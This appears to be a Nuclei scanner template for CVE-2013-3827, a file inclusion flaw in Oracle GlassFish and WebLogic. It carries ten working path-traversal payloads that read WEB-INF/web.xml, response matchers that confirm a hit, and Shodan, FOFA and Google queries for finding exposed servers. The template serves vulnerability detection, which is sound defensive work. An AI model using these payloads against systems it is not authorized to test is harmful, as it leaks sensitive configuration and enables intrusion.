id: CVE-2013-3827

info:
  name: Javafaces LFI
  author: Random-Robbie
  severity: medium
  description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
  impact: |
    Unauthenticated attackers can exploit local file inclusion through Java Server Faces resource handlers to read sensitive configuration files including WEB-INF/web.xml, exposing Oracle GlassFish, WebLogic, and JDeveloper application configurations.
  remediation: |
    Apply the latest patches and updates for the affected software to fix the LFI vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
    - https://www.exploit-db.com/exploits/38802
    - https://www.oracle.com/security-alerts/cpuoct2013.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
    - http://rhn.redhat.com/errata/RHSA-2014-0029.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2013-3827
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.86817
    epss-percentile: 0.99442
    cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
  metadata:
    max-request: 10
    vendor: oracle
    product: fusion_middleware
    shodan-query:
      - http.title:"weblogic"
      - http.html:"weblogic application server"
    fofa-query:
      - title="weblogic"
      - body="weblogic application server"
    google-query: intitle:"weblogic"
  tags: cve,cve2013,edb,lfi,javafaces,oracle,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"

    payloads:
      paths:
        - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
        - "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
        - "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<web-app"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202a98ed2ecde2d08f8beee068e8901227313ce466839c9c9e016e302beb7e329a02206c6df4dce6dfde3c2a9363a5630cf6bf1f50a2749eec5b097427cb6f1bb3a2aa:922c64590222798bb761d5b6d8e72950